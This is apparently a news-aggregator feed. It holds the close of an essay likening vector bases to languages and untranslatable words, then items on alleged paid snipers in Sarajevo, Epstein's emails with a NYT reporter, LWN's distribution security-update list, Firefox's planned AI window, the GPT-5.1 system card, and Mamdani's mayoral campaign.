These two concurrent interests made it hard for me not to see a connection. For almost a decade now, I've held it in a corner of my mind without telling anyone, perhaps because I thought it would be seen as too outrageous, but hey! Now LLMs are popular and they literally handle words and concepts as vectors with linear algebra operations, so maybe my analogy isn't that out there. Let me give it a try.

The Case of Vectors

Contrary to popular belief, a vector is not "a list of numbers" but an abstract object with no predefined way to express it.

You can think of vectors as arrows floating in space. No numbers involved.
You can think of vectors as arrows floating in space. No numbers involved.

But a vector is not very useful in this abstract state. We need a way to write it down so that we can manipulate it with algebra and communicate it to others. We do this by choosing a frame of reference—or, more accurately, a set of vectors to use as "basis" to quantify all others.

In the 2D case like this, if you set two vectors (e1 and e2) as the basis and decide that they have length 1, then you can find the coordinates of all other vectors based on their comparison to that basis. The basis vectors act as measuring sticks.
In the 2D case like this, if you set two vectors (e1 and e2) as the basis and decide that they have length 1, then you can find the coordinates of all other vectors based on their comparison to that basis. The basis vectors act as measuring sticks.

This is where numbers come into play. By projecting the vectors against the basis vectors, you can assign them lists of numbers (two numbers each, in this two-dimensional case):

a = ( 0.5 0.7 ) , b = ( 0.8 0.3 ) \mathbf{a} = \begin{pmatrix} 0.5 \\ 0.7 \end{pmatrix}, \quad \mathbf{b} = \begin{pmatrix} 0.8 \\ 0.3 \end{pmatrix}

Those numbers are the coordinates of the vectors in that basis. For instance, the vector a \mathbf{a} can be read as " half as long as the e 1 \mathbf{e_1} vector along the direction of e 1 \mathbf{e_1} , and 0.7 0.7 times as long as the e 2 \mathbf{e_2} vector along the direction of e 2 \mathbf{e_2} ."

The important thing I want to convey here (and the last mathy thing to remember) is that if you were to choose a different basis, the same vector would have different coordinates.

Same vectors, different basis: the numbers are different.
Same vectors, different basis: the numbers are different.

In this new basis, the two vectors are written as:

a = ( 0.8 0.2 ) , b = ( 0.8 0.2 ) \mathbf{a} = \begin{pmatrix} 0.8 \\ 0.2 \end{pmatrix}, \quad \mathbf{b} = \begin{pmatrix} 0.8 \\ -0.2 \end{pmatrix}

In short, change the basis (e.g. from " e 1 \mathbf{e_1} & e 2 \mathbf{e_2} " to " u 1 \mathbf{u_1} & u 2 \mathbf{u_2} ") and the same abstract object (vector) will be represented with different numbers. You can do all the same operations with them, like changing the vector's length and direction, calculating the angle between the vectors, and so on, and you'll get the same results in both bases, because they are operations on the same objects. The choice of basis is merely cosmetic from this point of view.

The Case of Language

Now let's turn to language and see the parallel.

Contrary to popular belief, a concept is not a word or a group of words but an abstract object in your mind.

A concept I have in mind now, shown as a drawing rather than words.
A concept I have in mind now, shown as a drawing rather than words.

But a concept is not very useful in this abstract state. We need a way to write it down so that we can manipulate it with grammar and communicate it to others. We do this by choosing a language that is shared with the receiver of the message.

For the concept in my head right now, and choosing the English language to represent it, you get this:

"Going to Tokyo"

This is where words come into play. By projecting the abstract idea onto the standard English vocabulary and grammar, you can assign it a list of words:

💭 = ( Going to Tokyo ) 💭 = \begin{pmatrix} \text{Going} \\ \text{to} \\ \text{Tokyo} \end{pmatrix}

Those words are the equivalent of the coordinates of the vectors in linear algebra. The way I just wrote it is not accurate, though, because it makes it look as if English only had 3 dimensions (3 words), just like the 2-element vectors were 2-dimensional. English actually has hundreds of thousands of words, so we would need a vector that long to fully represent it, with blank spaces for all the words that aren't involved in this case.

💭 = ( Going to Tokyo ) 💭 = \begin{pmatrix} \text{Going} \\ \text{to} \\ \text{Tokyo} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

The English language offers its speakers many other words, like camel , frolic , and or , but in this case none of them was necessary to express the idea that was in my mind, so they remain empty ( \emptyset ) and absent from my utterance of "going to Tokyo".


Abstract mosaic of irregular polygons in purple, pink, and white
Image by vackground.com, Unsplash

Of course, similar to vectors with bases, you can express the same concept in a different language. If I chose Italian as the "basis", you'd get:

"Andare a Tokio"

The concept is the same, but now its representation (its "word coordinates") is different:

💭 = ( Andare a Tokio ) 💭 = \begin{pmatrix} \text{Andare} \\ \text{a} \\ \text{Tokio} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

You can, in theory, say those two different sequences of sounds in those two languages, and obtain the same effect in the mind of the receiver. The only requirement is that all people involved know both languages.

Cosmetics Matter

Alright, the parallel seems plain enough. Sadly, expressing all language in that vector-like format would use up a lot of ink and is not really practical for everyday use. (LLMs kind of achieve that feat, but in a more convoluted and definitely not human-readable way.)

Why do I think it is interesting, then? Because "untranslatable" words exist.

The words that people sometimes call "untranslatable" are terms that have a clear and widely understood meaning in one language, but no equivalent in another one. I gave some examples from Japanese before, and the web is awash with blog posts enumerating curious words like that from many other languages. The key takeaway is that what only takes a single word in Language 1 can only be expressed with some accuracy in Language 2 if you use many words to explain them in all of their facets.

I wrote that the choice of basis in linear algebra is "cosmetic", because the result of an operation on vectors does not change depending on the basis. But that is only the ideal, mathematical way to look at it. We humans are not so ideal. We are weak and fallible and sometimes we even stink.

Which vector representation do you like better between these two?

v = ( 0.498213 0.731212 ) \mathbf{v} = \begin{pmatrix} 0.498213 \\ 0.731212 \end{pmatrix}

or

v = ( 1 0 ) \mathbf{v} = \begin{pmatrix} 1 \\ 0 \end{pmatrix}

Both represent the same vector under different bases, because I chose a base that has the vector v \mathbf{v} as one of the basis vectors . Here is what the two cases look like graphically:

Left: a vector in a generic basis, with both components not zero. Right: the same vector in a basis where it is itself one of the basis vectors. In this case, the coordinates are 1 on the first component e1 (it is "one times" itself) and 0 on the other (there is "nothing to project" on it).
Left: a vector in a generic basis, with both components not zero. Right: the same vector in a basis where it is itself one of the basis vectors. In this case, the coordinates are 1 on the first component e1 (it is "one times" itself) and 0 on the other (there is "nothing to project" on it).

In theory , both representations are exactly equivalent to each other. A computer wouldn't have any preference. But the second representation, the clean one with a simple one and zero, is not only easier to remember and grasp for a person, but it is also easier to handle mathematically. Things simplify easily with it, everything that is multiplied by zero becomes zero, and similarly for the multiplications by one. The calculations proceed faster and with fewer errors.

This means that, at least for our feeble organic minds, the choice of basis does matter.

The same holds for language. A concept that took several words in English...

💭 = ( Going to Tokyo ) 💭 = \begin{pmatrix} \text{Going} \\ \text{to} \\ \text{Tokyo} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

in Japanese is a single word: joukyou (上京)

💭 = ( 上京 ) 💭 = \begin{pmatrix} \text{上京} \\ \emptyset \\ \emptyset \\ \emptyset \\ \vdots \end{pmatrix}

Looking at it in the other direction, a native word in one language is like one of its "basis vectors"—simple and straightforward—but the underlying concept might need to be "spread out" onto several words when applying a different language (i.e. "basis").

Arguably, having a compact word makes it easier not only to express the concept, but also to think about it. This is the Sapir-Whorf debate , but I'll leave that for another day. Instead, I want to show you what this means for untranslatability, because there are people who vehemently deny their existence.

Losing in Translation

I think there are two ways in which this analogy makes it quite obvious that "practical untranslatability" is a thing.

First, communication is costly, and we don't have infinite time and space to put in all the words that are needed. Even if the word could in theory be explained in the other language, usually it's not worth it.

For example, the Japanese term mono no aware (物の哀れ) could be rather accurately translated as

a gentle, poignant sadness or pathos felt in response to the transient nature of all things, a deep awareness of their impermanence that evokes a subtle, bittersweet sorrow and a profound, quiet empathy for their passing.

In a dictionary, perhaps that's okay. But a dictionary is not translation. Translation is about conveying the meaning of full texts, and you can't do that kind of multi-line expansion for every word.

And so the translator simplifies it to the gist, e.g. as the pathos of all things . This conveys the majority of the meaning and it is usually enough, but it does lose a lot in the process.

This is exactly analogous to the data analysis technique called Principal Component Analysis (PCA), where one simplifies a vector by picking only its largest coordinates and disregarding all others. This means choosing a subset of the basis vectors that are more closely aligned with the vectors of interest, and ignoring the existence of the other basis vectors, effectively reducing the dimensions of the data. Translators use a version of PCA every time they (begrudgingly) accept to leave the finer nuances of a concept unsaid for the sake of space.

But, even assuming you do have time to explicate, using many more words increases the risk of introducing unintended nuances that come bundled with those extra words. This is like doing PCA but selecting inappropriate basis vectors, which introduce lots of small errors in the calculation of the vector's coordinates. Is "sorrow" too emotionally charged in that long translation of mono no aware ? Does the use of "passing" unnecessarily remind English speakers of people dying?

You eventually hit diminishing returns: using more words confuses the reader instead of clarifying things further.


Abstract mosaic of irregular polygons in coral, turquoise, and navy
Image by vackground.com, Unsplash

The second problem with translation is precision. Even if you can use many words, and even if none of those are misleading, words are still finite in number. Unlike ideal numerical coordinates, which can take any value down to the finest detail, you only have a small selection of words to convey a given bit of meaning.

Suppose you realize that the word "subtle" is not accurate enough in the "...evokes a subtle, bittersweet" part of the translation above. Maybe you do want to convey subtlety, but feel that the simple word "subtle" feels too strong in this case. You might try to soften it with an adverb, like "somewhat subtle" or "slightly subtle", but there aren't many other options out there. What if none of them is perfect for your current needs?

In this sense, language is "quantized": you can jump from one level of intensity of some meaning to the next, but you can't express anything in between.

This is a problem shared by all computers. Unlike ideal numbers, the numbers in a processor necessarily have a finite number of decimal places. So when you want to work with the ideal vector

v = ( 12.21983714303 0.6124152102345 3.0280184181084 0.10000003 ) \mathbf{v} = \begin{pmatrix} -12.21983714303 \\ 0.6124152102345 \\ 3.0280184181084 \\ 0.10000003 \end{pmatrix}

the storage limitations of your computer might mean that you have to content yourself with this truncated version:

v = ( 12.219 0.61241 3.0280 0.1 ) \mathbf{v} = \begin{pmatrix} -12.219 \\ 0.61241 \\ 3.0280 \\ 0.1 \end{pmatrix}

(Modern computers can usually handle many more digits than that, but you get the idea.)

Graphically, it looks something like this:

Left: An ideal vector. Right: how that vector might be stored if the smallest increment that the computer can store is the separation between the grid lines. This is a loss of accuracy.
Left: An ideal vector. Right: how that vector might be stored if the smallest increment that the computer can store is the separation between the grid lines. This is a loss of accuracy.

(Incidentally, AI engineers sometimes intentionally quantize large language models to make them take up less memory, but this tends to make them dumber, because they lose nuance.)

With language, like with computers, we're forced to "lower the resolution" of our concepts whenever we put them into words. This happens twice in translated text: once when the author first writes down their thoughts, then once more when the translator transports that already-degraded concept into a different language with different "quantization steps".

Between the Lines

I hope these rather unorthodox leaps between linguistics and mathematics helped make it almost obvious that some words and ideas are untranslatable in practice . I also hope you don't take the analogy too seriously, because it won't go much further than this. You might be tempted to begin talking about "word matrices" and whatnot, but I doubt it would help clarify things. That kind of advanced linear algebra with concepts might work for LLMs, but it doesn't seem to map to anything intelligible for a human being, not to mention make you any wiser.

Besides, language has something going for it that doesn't seem to have a mathematical equivalent: what does it mean to "read between the lines"?

It's hard to pin down, but I think it has to do with the structure and context of the words communicating something that is not contained in any of the words themselves. Perhaps it is the clever use of those "negligible coordinates"—the fringe nuances—of words scattered around the text to produce a collective effect on the reader.

A good translator might not be able to exactly translate a given word or sentence, but they might be able to "write between the lines" so that it doesn't matter very much. ●

Cover image:

Image by vackground.com, Unsplash

What Comes After Science?

Hacker News
www.science.org
2025-11-14 14:32:49
Comments...

Wealthy foreigners 'paid for chance to shoot civilians in Sarajevo'

Hacker News
www.thetimes.com
2025-11-14 14:32:11
Comments...
Original Article

Wealthy foreign gun enthusiasts paid Bosnian Serb forces for the chance to shoot residents of Sarajevo during the siege of the city during the 1990s, according to claims being investigated by Italian magistrates.

The investigation was prompted by new evidence that “weekend snipers” paid handsomely to line the hills around Sarajevo and join in the Bosnian Serb siege, which killed more than 11,500 people between 1992 and 1996 during the Balkan Wars.

The investigation into the alleged “human safari” in Sarajevo has been opened after years of research by the Italian writer Ezio Gavazzeni, who said a key source was a former Bosnian intelligence officer.

“What I learnt is that Bosnian intelligence warned the local office of the Italian secret service … about the presence of at least five Italians who were taken to the hills above Sarajevo to shoot civilians,” he told the Italian daily La Repubblica.

Gavazzeni started investigating after watching the 2022 documentary Sarajevo Safari , by the Slovenian film-maker Miran Zupanic. The film quoted an unnamed American former spy saying that he had seen visitors paying to shoot civilians. Serbian veterans have denied the claims.

Although there are allegations that snipers arrived from around Europe, Gavazzeni focused on reports of Italians gathering in the Trieste before they were escorted to Sarajevo.

“One of the Italian snipers identified to SISMI [the Italian secret service] in 1993 was from Milan, and the owner of a private clinic specialising in cosmetic surgery,” he said. “We are talking about wealthy people, entrepreneurs with a reputation, who during the siege of Sarajevo paid to be able to kill helpless civilians.”

His job is to keep Bosnia peaceful — now he must take on Putin too

After their trips to Sarajevo , he said, “they returned to their respectable lives”. He added that the snipers proved “the indifference of evil — becoming God and remaining unpunished”.

As Milan magistrates seek to identify the Italian snipers, Gavazzeni said he hoped to get the secret service documents about them. “I would really like to read them. I hope they haven’t vanished — it would be very serious.”

The Bosnian consul in Milan, Dag Dumrukcic, told La Repubblica that the Bosnian government would offer “total collaboration” to the magistrates. “We are impatient to discover the truth about such a cruel matter in order to close a chapter of history. I am in possession of certain information I will be sharing with the investigators,” he said.

Epstein Gave NY Times Journalist Tips About Trump. Why Did They Never Get Reported?

Intercept
theintercept.com
2025-11-14 14:30:04
Exchanges about Trump between a reporter and Epstein raise questions about what the New York Times knew and when. The post Epstein Gave NY Times Journalist Tips About Trump. Why Did They Never Get Reported? appeared first on The Intercept....
Original Article

The trove of documents from a House investigation dumped online Wednesday reveal explosive new details about how the late, disgraced financier Jeffrey Epstein wielded influence with prominent and powerful people across the political spectrum.

Epstein’s influential friends, however, weren’t all household names. The documents also reveal details of Epstein’s unusually close relationships with scientists, academics, and philanthropists — and how he had a cozy arrangement with members of the media who got juicy tips from Epstein and did little critical work about him.

One reporter with whom Epstein connected frequently was Landon Thomas Jr., a financial journalist at the New York Times. Thomas exchanged dozens of emails with Epstein between 2015 and 2018, years after the financier’s conviction for soliciting a minor.

Epstein fed information to Thomas about Donald Trump’s allegedly lecherous behavior.

In the emails, Thomas tipped off Epstein about inquiries by other reporters and claimed to have vouched for Epstein, whom he said he called “one hell of a guy.” In one exchange, Thomas coached Epstein on how to repair his reputation.

The relationship was a two-way street. Epstein, who died in a Manhattan federal jail in 2019 awaiting trial on charges of sex trafficking, was reportedly a valued source for Thomas. In the emails released Wednesday, one of the topics Epstein fed information to Thomas was about Donald Trump’s allegedly lecherous behavior. In the exchanges — through his trademark style of lowercase letters and abundant typos — Epstein alludes to Trump’s predilection for young women.

“read the [BuzzFeed story] re my airplane logs and hawain tropic contest,” Epstein wrote in one email on December 8, 2015, alluding the Trump’s frequent travel on the financier’s private plane. “have them ask my houseman about donad almost walking through the door leaving his nose print on the glass as young women were swimming in the pool and he was so focused he walked straight into the door.”

No reply or follow-up from Thomas appeared in the documents released Wednesday.

On one occasion, Thomas attempted to convince Epstein to speak out about Trump. Thomas had reportedly told his editors he solicited information from Epstein but would not write about Epstein himself. In the newly released email exchange, Thomas offered Epstein to pass any information about Trump to other journalists.

“I would not do it myself, but would pass on to a political reporter.”

“I am serious man — for the good of the nation why not try to get some of this out there,” Landon wrote in an exchange the same day. “I would not do it myself, but would pass on to a political reporter.”

Epstein deflected, sending a link to a story about a Norwegian heiress.

“my 20 year old girlfriend in 93„ that after two years i gave to donald,” Epstein replied.

“Amazing!” Thomas wrote back. “When did you last talk to him?”

Like the other exchange, the message is cryptic and no follow-up was recorded in the files released Wednesday to provide context. The Norwegian heiress has previously been linked to both Trump and Epstein , though she has denied being romantically involved with Epstein. Epstein’s claim that he “gave” the heiress to Trump had not previously surfaced.

Little Came to Light

In total, the exchanges about Trump between Thomas and Epstein amount to a series of tips about the president’s behavior. And these tips came from a known associate of the president, a convicted pedophile. Little of the information given to Thomas, however, ever saw the light of day — not in Thomas’s reporting, not in the New York Times, and not in any other outlets. The details are only now emerging with the release of Thomas’s cozy emails with Epstein.

“It would be useful for readers who have become aware of this to know more from the Times about who knew what, when,” said Margaret Sullivan, a media critic and a former public editor at The New York Times. “I think it’s really important for reporters to have their main constituency in mind, and that is the public.”

“Reporters have sources and some sources are unsavory or worse. But it’s really important to have the public interest at heart,” Sullivan said.

The Intercept made multiple attempts to contact Thomas at an address listed under his name, but was unable to speak with him for comment. In an interview with the Times on Wednesday, Thomas referred to Epstein as a “longstanding and very productive source.”

Danielle Rhoades Ha, a spokesperson for the New York Times, declined to respond to questions on the tips about Trump passed from Epstein to Thomas.

The White House said in a statement that the Epstein emails about Trump were a distraction.

“These emails prove literally nothing,” White House spokesperson Abigail Jackson told The Intercept. “Liberal outlets are desperately trying to use this Democrat distraction to talk about anything other than Democrats getting utterly defeated by President Trump in the shutdown fight. We won’t be distracted.”

Wednesday’s dump came amid a monthslong furor over the so-called “Epstein Files,” the moniker for documents held by the government that could shed further light on the late financier and pedophile.

Epstein’s criminal activities, close ties to the rich and powerful, and mysterious death — which was ruled a suicide — have given rise to investigations, conspiracy theories , and a raft of memes. Despite his personal ties to Epstein, Trump and his supporters brandished Epstein’s relationships with powerful Democrats as a political cudgel.

Now, the administration’s failure to provide full transparency on the case has become a political liability for the president, fueling disaffection among some of his staunchest supporters. The attention on the case triggered an investigation by the House Oversight Committee, which released the trove of emails on Wednesday in two batches: a small one from the Democrats, followed by a massive dump by Republicans.

If the GOP was hoping to extinguish the controversy surrounding Epstein, it may have doused the fire with gasoline instead — and the newly revealed exchanges between Thomas and Epstein are fanning the flames.

“Juicy Info”

When Trump launched his bid for the White House in 2015, his past relationship with Epstein — the men were even neighbors in Palm Beach, Florida — brought fresh scrutiny. One of the focuses was Thomas’s 2002 New York Magazine profile of Epstein, the first recorded interaction between the journalist and the pedophile.

The New York Magazine story is written in a glamorous, gossipy style that cast Epstein as an “ international moneyman of mystery ,” and is held up by Trump’s critics as evidence that the president knew a thing or two about Epstein’s obsession with underage girls. The innuendo flowed from a now-infamous quote where Trump spoke winkingly of Epstein’s predilection for younger women.

“I’ve known Jeff for fifteen years. Terrific guy,” Thomas quoted Trump as saying. “He’s a lot of fun to be with. It is even said that he likes beautiful women as much as I do, and many of them are on the younger side.”

Citing the future president’s “terrific guy” quote, Thomas wrote in a December 2015 email that he was fielding inquiries about Epstein and Trump.

“Now everyone coming to me thinking I have juicy info on you and Trump,” Thomas wrote. “Because of this.”

Two minutes later, Epstein replied.

“would you like photso of donald and girls in bikinis in my kitchen”

“would you like photso of donald and girls in bikinis in my kitchen,” he asked.

“Yes!!!” Thomas wrote back.

Epstein continued the exchange without following through on his offer.

More than a year later, Thomas was apparently still fielding questions about Epstein, this time from John Connolly, the former New York cop-turned-journalist who published a book on Epstein in 2017. On June 1, 2016, Thomas emailed Epstein to tip him off about the fresh round of questions.

“Keep getting calls from that guy doing a book on you — John Connolly. He seems very interested in your relationship with the news media,” Thomas wrote.

According to Thomas, Connolly had doubts about the veracity of Trump’s “terrific guy” quote from 2002.

“One oddity: he said he had been told that that quote from Trump about you in the original NY Mag story had been manufactured ie, that I did not actually speak to Donald,” Thomas wrote. “Which is bull shit of course.”

Later in the thread, Landon asked Epstein if he too had been questioned about his relationship to the GOP presidential hopeful.

“are you still getting calls from reporters re Trump?” Thomas asked.

“everyone except the NYT it seems :)” Epstein replied.

“How Are You Holding Up?”

Thomas’s relationship with Epstein helped precipitate the journalist’s downfall at the New York Times, according to NPR’s 2019 investigation into the pedophile financier’s relationship to the press. According to the story, Thomas had been asked to interview Epstein for the newspaper in 2018 and disclosed to his editors a friendship with Epstein — including Thomas’s solicitation of a $30,000 donation for a local uptown New York charity.

Thomas told his editors, according to NPR, that he pumped Epstein for information but did not report on him — though on several occasions in past years Thomas had. Thomas was barred from professional contact with Epstein, NPR reported, and within six months he was gone from the New York Times.

Rhoades Ha, the Times spokesperson, said Thomas had left the paper after ethical lapses were uncovered.

“Landon Thomas Jr. has not worked at The Times since early 2019,” she wrote in an email to The Intercept on Wednesday, “after editors discovered his failure to abide by our ethical standards.”

“You have moved on! People don’t know that and cant accept that unless you say as much.”

In 2008, on the eve of Epstein turning himself into Florida authorities, Thomas wrote one of his New York Times stories about the financier. Thomas traveled to Epstein’s now-notorious Caribbean island lair, Little Saint James. The story, critics said, soft-pedaled the offenses Epstein had pleaded guilty to, largely framing the charges around soliciting sex work rather than the alleged child victims, whose stories had by then become well known thanks to ongoing legal cases.

After his 2008 plea — now widely panned as a sweetheart deal by a Florida prosecutor who would later become political appointee in Trump’s first administration — Epstein led a comparatively low-profile life, even as he maneuvered behind the scenes to connect powerful players on a global stage.

The emails in Wednesday’s dump from the House don’t include any conversations between Thomas and Epstein until January 2015, when Thomas reached out to check up on Epstein.

“How are you holding up?” Thomas wrote in the subject line of an email sent on January 16.

It’s unclear what prompted the question, but it came just after a judge had heard arguments in Manhattan federal court over whether to unseal documents from the 2008 plea deal and allegations had emerged recently linking Epstein and Britain’s Prince Andrew to horrific acts of sexual violence.

If Epstein was worried, however, he didn’t show it.

“very well, my reputation has admittedly taken a hit,” Epstein replied. “however, again, more calls re currency than i can handle.”

Epstein proceeded to defend his conduct and cast aspersions on the character and motives of his accusers.

Thomas replied with some advice.

“I think the big issue is separating yourself from Andrew,” Thomas wrote. “I mean I can see why a statement might help in some way — but its Andrew (not clinton and the rest) that is keeping the story alive.”

“Until you are able to come forward and address that the story lives on,” Thomas continued. “You have moved on! People don’t know that and cant accept that unless you say as much.”

Thomas then asked Epstein for his thoughts on global currencies.

5 Films to Watch at This Year's DOC NYC

hellgate
hellgatenyc.com
2025-11-14 14:15:50
Docs for your weekend and some links to start your day....
Original Article

A brand-new Hell Gate Podcast will be dropping later today! You won't want to miss it. Listen and subscribe here , or wherever you get your podcasts.


But first, a message from this edition's sponsor:

GOOD JOB EVERYONE! We love a plucky upstart sticking it to the establishment. That’s why we built oh hi ♡ – our own, DIY dating app for cool and chill singles in NYC. Download the app, hook yourself up, and damn the man. We’re gonna have a good time →


The weather this weekend will be moody and serious, perfect for a dreamy, gloomy long walk through Lower Manhattan, your hands in your pockets and your collar fastened to your ears, as you make your way to a documentary screening ( and maybe a $20 dinner after ?).

If that's your ideal day, you're in luck: DOC NYC , which bills itself as "America's largest documentary festival," is back this year at three venues across Lower Manhattan (IFC Center, Village East, and the SVA Theater), running from this week through the end of the month.

At DOC NYC, you can see a bunch of documentaries that might never make it to theaters or streaming. Here are five docs (most with some connection to New York City) that we're not going to miss this year.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Security updates for Friday

Linux Weekly News
lwn.net
2025-11-14 14:09:15
Security updates have been issued by Debian (keystone and lxd), Fedora (docker-buildkit, firefox, gh, gitleaks, lasso, runc, and seamonkey), Mageia (perl-Authen-SASL, perl-Cpanel-JSON-XS, perl-Crypt-OpenSSL-RSA, perl-JSON-XS, python-flask-cors, python-py, python-setuptools, and ruby), Oracle (java-1...
Original Article
Dist. ID Release Package Date
Debian DSA-6056-1 stable keystone 2025-11-13
Debian DSA-6057-1 stable lxd 2025-11-13
Fedora FEDORA-2025-122a933cad F41 docker-buildkit 2025-11-14
Fedora FEDORA-2025-ac008831d6 F42 docker-buildkit 2025-11-14
Fedora FEDORA-2025-d1dade0612 F43 docker-buildkit 2025-11-14
Fedora FEDORA-2025-457ee8a964 F42 firefox 2025-11-14
Fedora FEDORA-2025-6981d97f47 F43 gh 2025-11-14
Fedora FEDORA-2025-a10fad6506 F42 gitleaks 2025-11-14
Fedora FEDORA-2025-7e6204e34e F41 lasso 2025-11-14
Fedora FEDORA-2025-3edcd991a4 F42 lasso 2025-11-14
Fedora FEDORA-2025-6924245627 F41 runc 2025-11-14
Fedora FEDORA-2025-ef192f5d10 F42 runc 2025-11-14
Fedora FEDORA-2025-ebd4913540 F43 runc 2025-11-14
Fedora FEDORA-2025-e49d776723 F41 seamonkey 2025-11-14
Fedora FEDORA-2025-4eaa870223 F42 seamonkey 2025-11-14
Fedora FEDORA-2025-5f24a0c1ba F43 seamonkey 2025-11-14
Mageia MGASA-2025-0285 9 perl-Authen-SASL 2025-11-13
Mageia MGASA-2025-0284 9 perl-Cpanel-JSON-XS 2025-11-13
Mageia MGASA-2025-0287 9 perl-Crypt-OpenSSL-RSA 2025-11-13
Mageia MGASA-2025-0283 9 perl-JSON-XS 2025-11-13
Mageia MGASA-2025-0286 9 python-flask-cors 2025-11-13
Mageia MGASA-2025-0289 9 python-py 2025-11-14
Mageia MGASA-2025-0288 9 python-setuptools 2025-11-14
Mageia MGASA-2025-0290 9 ruby 2025-11-14
Oracle ELSA-2025-18814 OL7 java-1.8.0-openjdk 2025-11-13
SUSE SUSE-SU-2025:4096-1 MP4.3 SLE15 SES7.1 oS15.3 oS15.4 oS15.5 oS15.6 binutils 2025-11-14
SUSE SUSE-SU-2025:4091-1 oS15.6 cargo-packaging, rust-bindgen 2025-11-13
SUSE openSUSE-SU-2025:0430-1 osB15 chromium 2025-11-14
SUSE openSUSE-SU-2025:15729-1 TW go-sendxmpp 2025-11-13
SUSE openSUSE-SU-2025:15730-1 TW helm 2025-11-13
SUSE SUSE-SU-2025:4090-1 MP4.3 SLE15 SES7.1 lasso 2025-11-13
SUSE SUSE-SU-2025:4094-1 SLE12 lasso 2025-11-14
SUSE SUSE-SU-2025:4104-1 SLE12 libxml2 2025-11-14
SUSE SUSE-SU-2025:4097-1 SLE12 openssh 2025-11-14
SUSE SUSE-SU-2025:4098-1 SLE12 openssh8.4 2025-11-14
SUSE SUSE-SU-2025:4100-1 SLE15 oS15.6 python-Django 2025-11-14
SUSE openSUSE-SU-2025:15732-1 TW python-Scrapy-doc 2025-11-13
SUSE openSUSE-SU-2025:15731-1 TW python311-Brotli 2025-11-13
SUSE SUSE-SU-2025:4099-1 SLE12 squid 2025-11-14
SUSE SUSE-SU-2025:4103-1 SLE15 oS15.6 tomcat10 2025-11-14
SUSE openSUSE-SU-2025:15733-1 TW weblate 2025-11-13
Ubuntu USN-7861-3 22.04 24.04 linux-nvidia-6.8, linux-oracle, linux-oracle-6.8 2025-11-13
Ubuntu USN-7862-3 22.04 linux-xilinx-zynqmp 2025-11-13

I think nobody wants AI in Firefox, Mozilla

Hacker News
manualdousuario.net
2025-11-14 14:05:00
Comments...
Original Article

Mozilla is developing a built‑in AI assistant for Firefox that will be offered as a third browsing mode alongside Normal and Private tabs. They’re calling it “Window AI.”

Details are still scarce. Based on Mozilla’s official announcement on Thursday (13 th ), it looks like a deeper implementation than the existing sidebar that gives access to third‑party chatbots (ChatGPT, Gemini, Copilot, etc.). The post stresses the feature will be opt-in and that the user “is in control.”

There’s a waitlist to try the feature and a Mozilla forum thread inviting people to “help shape” the initiative.

Illustration showing Firefox’s three modes/windows: normal, “Window AI” and private window.
Image: Mozilla.

It’s safe to say that the people who volunteered to “shape” the initiative want it dead and buried . Of the 52 responses at the time of writing, *all* rejected the idea and asked Mozilla to stop shoving AI features into Firefox.

I don’t know whether the negative reactions reflect the majority of Firefox users or are just a noisy minority. Mozilla, after all, likely has a clearer view of the whole user base.

What strikes me as odd is the decision to position itself as just another AI‑enabled web browser , picking a fight with big techs and better‑funded startups whose users are less hostile (and sometimes enthusiastic) about adding AI to web browsing.

Mozilla seems to be trying to wedge itself between those who reject AI and those who want generative‑AI features in the browser — trying to please everyone — as this excerpt from the post shows:

We see a lot of promise in AI browser features making your online experience smoother, more helpful, and free from the everyday disruptions that break your flow. But browsers made by AI companies ask you to make a hard choice — either use AI all the time or don’t use it at all.

We’re focused on making the best browser, which means recognizing that everyone has different needs. For some, AI is part of everyday life. For others, it’s useful only occasionally. And many are simply curious about what it can offer, but unsure where to start.

Regardless of your choice, with Firefox, you’re in control.

Those unhappy have another option: use an AI‑free Firefox fork such as LibreWolf , Waterfox , or Zen Browser .

GPT-5.1 Instant and GPT-5.1 Thinking System Card Addendum

Simon Willison
simonwillison.net
2025-11-14 13:46:23
GPT-5.1 Instant and GPT-5.1 Thinking System Card Addendum I was confused about whether the new "adaptive thinking" feature of GPT-5.1 meant they were moving away from the "router" mechanism where GPT-5 in ChatGPT automatically selected a model for you. This page addresses that, emphasis mine: GPT‑5...
Original Article

GPT-5.1 Instant and GPT-5.1 Thinking System Card Addendum . I was confused about whether the new "adaptive thinking" feature of GPT-5.1 meant they were moving away from the "router" mechanism where GPT-5 in ChatGPT automatically selected a model for you.

This page addresses that, emphasis mine:

GPT‑5.1 Instant is more conversational than our earlier chat model, with improved instruction following and an adaptive reasoning capability that lets it decide when to think before responding. GPT‑5.1 Thinking adapts thinking time more precisely to each question. GPT‑5.1 Auto will continue to route each query to the model best suited for it , so that in most cases, the user does not need to choose a model at all.

So GPT‑5.1 Instant can decide when to think before responding, GPT-5.1 Thinking can decide how hard to think, and GPT-5.1 Auto (not a model you can use via the API) can decide which out of Instant and Thinking a prompt should be routed to.

If anything this feels more confusing than the GPT-5 routing situation!

The system card addendum PDF itself is somewhat frustrating: it shows results on an internal benchmark called "Production Benchmarks", also mentioned in the GPT-5 system card , but with vanishingly little detail about what that tests beyond high level category names like "personal data", "extremism" or "mental health" and "emotional reliance" - those last two both listed as "New evaluations, as introduced in the GPT-5 update on sensitive conversations " - a PDF dated October 27th that I had previously missed.

That document describes the two new categories like so:

  • Emotional Reliance not_unsafe - tests that the model does not produce disallowed content under our policies related to unhealthy emotional dependence or attachment to ChatGPT
  • Mental Health not_unsafe - tests that the model does not produce disallowed content under our policies in situations where there are signs that a user may be experiencing isolated delusions, psychosis, or mania

So these are the ChatGPT Psychosis benchmarks!

How Mamdani Won: Field Director Tascha Van Auken on Grassroots Organizing Behind Historic Victory

Democracy Now!
www.democracynow.org
2025-11-14 13:45:43
Mayor-elect Zohran Mamdani is less than two months away from taking office in New York City. Mamdani’s history-making campaign, grounded in community organizing, propelled the little-known Assembly-member to victory. Candidate Mamdani famously began the campaign polling at just 1% and overcam...
Original Article

Mayor-elect Zohran Mamdani is less than two months away from taking office in New York City. Mamdani’s history-making campaign, grounded in community organizing, propelled the little-known Assembly-member to victory. Candidate Mamdani famously began the campaign polling at just 1% and overcame the intense scrutiny, Islamaphobic attacks, criticism for his support for Palestinian rights, and more. By election day, more than 2 million New Yorkers had cast their votes, a turnout record that hasn’t been matched going back more than half a century.

